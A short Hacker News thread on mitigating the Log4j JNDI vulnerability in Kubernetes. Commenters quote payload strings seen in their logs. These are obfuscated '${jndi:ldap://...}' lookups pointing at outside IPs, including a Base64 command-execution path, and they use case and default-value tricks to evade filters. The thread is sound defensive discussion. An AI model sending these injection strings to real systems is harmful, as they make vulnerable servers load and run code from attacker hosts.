Hacker News new | ask | show | jobs
by azifali 1646 days ago
We have published a mitigation for K8s which could be applied by

1. blocking outbound jndi lookups through a network policy 2. Blocking possible execs from the Java Process:

https://blog.accuknox.com/log-4j-exploit-and-mitigation/
1 comments
shushpanchik 1646 days ago
As I understood, your policy blocks LDAP port (389). All of the scanning I see in logs at the moment use port 80: "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
link
iso1631 1646 days ago
Last ones I've seen

jndi:dns://ip.address.scanworld.net/ref

jndi:ldap://162.55.90.26/222xxxx905/C

jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...

jndi:ldap://45.130.229.168:1389/Exploit

{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....

Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.

I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.

link